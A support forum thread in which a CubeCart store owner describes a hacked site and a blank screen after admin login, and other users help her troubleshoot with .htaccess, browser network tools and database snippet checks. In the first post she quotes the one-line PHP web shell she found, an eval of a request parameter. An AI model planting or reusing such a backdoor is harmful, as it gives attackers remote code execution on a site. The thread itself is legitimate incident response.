Jump to content

White Screen on Login or PW Change--Hacked


Recommended Posts

Last week I upgraded from v6.4.2 to v6.4.4. Everything seemed to be working fine until after the weekend. Now when I enter username/password and click to log in I get a white screen. When I use the password change form, the same thing happens--I click, it seems to submit the form just fine, but all I see is a white screen.

I've tried checking the error_log but there is nothing. I've tried enabling "display_errors" in debug.class.php, but nothing. I've also checked to see if something was reconfigured on the hosted server, but no.

I'm pretty sure I've been hacked, because I checked the /includes/extra folder and found an /includes/extra-BAD folder as well. Inside the /extra-BAD folder was a snippet file I didn't recognize and a public key code file and some sess_ files. The snippet file contained just one line of PHP code: eval($_REQUEST["4ikT7"]). Here's a sample sess_ file content:

__client|a:5:{s:10:"ip_address";s:14:"208.115.113.85";s:9:"useragent";s:90:"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, [email protected])";s:13:"session_start";i:1451332019;s:12:"session_last";i:1451332019;s:8:"language";s:5:"en-US";}__system|a:1:{s:5:"token";s:32:"21828537828a8497b3b39a0f63864d74";}__recaptcha|a:2:{s:5:"error";N;s:9:"confirmed";b:0;}

The final "error" was in all of them.

I've removed the alien files and folder from the server, of course, but I still can't login. Any ideas? I didn't see any unfamiliar files in /images so not sure if the snippet was used to redirect to other servers or if I've got hacked content someplace else. I could really use help on this one.

 

Thanks,

Nancy

Link to comment
Share on other sites

Does the storefront work?

Do you happen to have the CubeCart Security Suite module installed?

If there is no error_log, then it may be the case that the web server is disagreeing with something in the .htaccess file (assuming you are using Apache web server) - that is, before PHP even starts up and gets a chance to report anything to the error_log.

 

Link to comment
Share on other sites

Yes, the storefront works, except customers can't change their passwords.

No, I don't have it but will certainly check out the Security Suite as soon as I can get in to admin install it.

Yes I'm using a hosted Apache server. I've checked some of the .htaccess files, but will do that again and more thoroughly. Thanks!

 

Link to comment
Share on other sites

Is it generally safe to delete files and folders that were used in previous versions but not the latest? Omitting things like user files such as images, of course. For example, I have a /phpMailer folder on the server, but the latest version doesn't have that but has /PHPMailer instead. Is it safe to delete the /phpmailer folder?

I'm trying to get as close to a clean install as possible.

Thanks for the help.

 

Link to comment
Share on other sites

You can delete the oldest folder (which should be phpMailer - note the lowercase php).

Not being able to log in vs. getting a white screen after submitting the form to do so are two different things.

A failed login attempt will be shown to you.

A white screen means something went wrong (as opposed to being denied).

Your browser will have a Developer's Tools set of functions. One is a 'Network' tab where one can see what got posted and what was returned, if anything. Aside from the content, there will be a collection of HTTP headers in the response. Importantly, there will be the "Response status" code from the web server. That code will either be, commonly: 200, 500, or 304.

A status of 500 is trouble - somewhere.

 

Link to comment
Share on other sites

I found some php files in a subdirectory /cache/controllers that I don't see in recent versions. They had to do primarily with admin sessions. I've removed them.

Thanks for the tip about the Developer's Tools. I had forgotten about that. I'll check it now.

 

Link to comment
Share on other sites

With Developer Tools in Chrome, I get response status 200 on both the login page and the white screen after I submit the login. Here's the headers from after the login is submitted (with username/password removed, but it was listed correctly--I also altered the admin page name, but it too was listed correctly). I don't see any obvious errors but I don't know how to interpret parts of it.

    1. Request URL:
    2. Request Method:
      POST
    3. Status Code:
      200
    4. Remote Address:
      216.92.173.98:443
    5. Referrer Policy:
      strict-origin-when-cross-origin
  1. Response Headers
    1. cache-control:
      pre-check=0, post-check=0, max-age=0
    2. content-encoding:
      gzip
    3. content-type:
      text/html; charset=UTF-8
    4. date:
      Tue, 19 Oct 2021 21:50:43 GMT
    5. expires:
      -1
    6. pragma:
      no-cache
    7. server:
      Apache
    8. set-cookie:
      CCS_B0C4C3B217=bca7de24aee9eb9bf3f50f1e0d9025d6; expires=Tue, 26-Oct-2021 21:50:43 GMT; Max-Age=604800; path=/store; domain=.treefrogfarm.com; secure; HttpOnly; SameSite=None
    9. vary:
      Accept-Encoding
    10. x-frame-options:
      SAMEORIGIN
    11. x-powered-by:
      PHP/7.4.24
  2. Request Headers
    1. :authority:
      www.treefrogfarm.com
    2. :method:
      POST
    3. :path:
      /store/admin_xxx.php
    4. :scheme:
      https
    5. accept:
      text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    6. accept-encoding:
      gzip, deflate, br
    7. accept-language:
      en-US,en;q=0.9
    8. cache-control:
      no-cache
    9. content-length:
      176
    10. content-type:
      application/x-www-form-urlencoded
    11. cookie:
      CCS_B0C4C3B217=5fd53b369b82009b0ed9e34c5de6ddf7; __utmc=183381347; __utmz=183381347.1630434710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __zlcmid=165kKkjobQZfVNO; _ga=GA1.2.290882159.1630434710; PHPSESSID=f4d343e193cb3f424f941320669d06c5; __utma=183381347.290882159.1630434710.1634628236.1634671021.12
    12. origin:
    13. pragma:
      no-cache
    14. referer:
    15. sec-ch-ua:
      "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99"
    16. sec-ch-ua-mobile:
      ?1
    17. sec-ch-ua-platform:
      "Android"
    18. sec-fetch-dest:
      document
    19. sec-fetch-mode:
      navigate
    20. sec-fetch-site:
      same-origin
    21. sec-fetch-user:
      ?1
    22. upgrade-insecure-requests:
      1
    23. user-agent:
      Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36
  3. Form Dataview sourceview URL-encoded
    1. username:
      xxxxxxxx
    2. password:
      xxxxxxxxxxxxxxxx
    3. redir:
    4. login:
      Log In
    5. token:
      d6652a13b7cdc75d9bc2e897c76e0136
Link to comment
Share on other sites

In your .htaccess file, I think there must be this correct declaration:

 RewriteBase /store/

Using an external database utility, look in the database table CubeCart_code_snippet. (Perhaps you have already done this, working through the 'Have I been hacked' knowledgebase article.) Look for any snippets here that you do not recognize.

The line (in Network Developer's Tools) that follows the POST entry... you say it also has a 200 Status? Does the Network screen have a panel that shows you the content that was delivered?

Link to comment
Share on other sites

  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...